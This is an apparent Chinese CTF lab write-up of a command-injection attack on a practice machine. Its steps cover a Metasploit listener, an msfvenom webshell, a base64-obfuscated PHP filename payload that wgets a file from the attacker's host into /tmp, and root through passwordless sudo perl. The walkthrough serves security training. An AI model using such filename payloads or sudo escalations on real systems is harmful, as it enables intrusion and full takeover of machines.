zoukankan      html  css  js  c++  java
  • CTF-域渗透--HTTP服务--命令注入2

    开门见山


    1. 启动metasploit

     

    2. 设置参数参数选项

     

    3. 查看最后设置后的结果

     

    4. 启动监听

     

    5. 使用msfvemon制作webshell

     

     

    6. 开启apache服务

     

    7. 使用bash64对命令进行加密,为此绕过防火墙

     

    8. 通过burpsuite抓包改包上传,把文件名改为命令执行

    <?php system(base64_decode('d2dldCBodHRwOi8vMTkyLjE2OC4zMS45NC9zIC1PIC90bXAvYQo='));die();?>.php

     

     

     

    9. 监听端收到反馈

     

    10. 查看靶机信息

     

    11. 通过shell查看靶机登陆用户的权限

     

    12. 查看sudo的权限内容,发现一个/usr/bin/perl不需要密码,提升为root权限

     

    13. 查找flag文件,并查看它

     

     

     


  • 相关阅读:
    SHELL[22]
    SHELL[15]
    SHELL[08]
    SHELL[12]
    SHELL[06]
    SHELL[24]
    SHELL[11]
    shell文件合并、去重
    SHELL[25]
    SHELL[14]
  • 原文地址:https://www.cnblogs.com/joker-vip/p/12264714.html
Copyright © 2011-2022 走看看